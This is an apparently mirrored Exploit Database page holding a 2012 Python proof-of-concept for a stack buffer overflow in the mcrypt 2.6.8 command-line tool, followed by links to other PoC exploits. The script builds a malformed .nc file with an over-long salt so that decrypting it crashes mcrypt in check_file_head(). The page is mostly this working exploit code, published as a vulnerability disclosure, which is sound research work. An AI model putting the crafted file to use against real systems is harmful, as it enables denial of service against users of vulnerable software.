mcrypt 2.6.8 – Stack Buffer Overflow (PoC)

Exploit Database
11 阅读

作者： _ishikawa

日期： 2012-11-26
类别：
- dos
平台：
- linux
来源：https://www.exploit-db.com/exploits/22938/

#!/usr/bin/env python

# mcrypt <= 2.6.8 stack-based buffer overflow poc
# http://mcrypt.sourceforge.net/
# (the command line tool, not the library)
#
# date: 2012-09-04
# exploit author: _ishikawa
# tested on: ubuntu 12.04.1
# tech: it overflows in check_file_head() when decrypting .nc files with too long salt data
#
# shout-outs to all cryptoparty people

import sys

sprawl = 105
gibson = "\x00\x6d\x03\x40\x73\x65\x72\x70\x65\x6e\x74\x00\x20\x00\x63\x62"
gibson += "\x63\x00\x6d\x63\x72\x79\x70\x74\x2d\x73\x68\x61\x31\x00"
gibson += chr(sprawl)
gibson += ("A" * sprawl)
gibson += (chr(0) * 3)

try:
count0 = open("cyberpunk.nc", "wb")
count0.write(gibson)
count0.close()
except IOError:
print "file error"
sys.exit(1)

print "now runmcrypt -d cyberpunk.nc"

last Exploits
mcrypt 2.6.8 – Stack Buffer Overflow (PoC)的更多信息

Termite 3.4 – Denial of Service (PoC)：
Foxit Reader 3.1.4.1125 – ActiveX Heap Overflow (PoC)：
Microsoft Windows cryptoapi – SymCrypt Modular Inverse Algorithm Denial of Service：
WinRadius 2.11 – Denial of Service：
Linux Kernel 2.6.33.3 – SCTP INIT Remote Denial of Service：
iFTP 2.21 – Buffer Overflow Crash (PoC)：
Linux Kernel – io_submit L2TP sendmsg Integer Overflow：
SpyCamLizard 1.230 – Denial of Service：